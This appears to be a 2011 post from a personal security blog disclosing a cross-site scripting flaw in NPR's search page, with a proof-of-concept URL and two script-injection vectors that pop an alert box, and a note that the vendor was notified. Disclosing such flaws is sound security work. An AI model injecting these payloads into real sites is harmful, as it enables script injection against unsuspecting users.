This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
01 Mar 11

NPR

Date: Mar-01-2011
Vendor Notified: Yes
Proof of Concept:
http://www.npr.org/search/index.php?searchinput=alert(0);%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(0);%3C/script%3E

 

Vectors:

  • alert(0);</script>">'><script>alert(0);</script>
  • ';alert(0)//\';//";//\";alert(0)//--></script>">'><script>alert(0)</script>



Copyright © 2012 benburns.org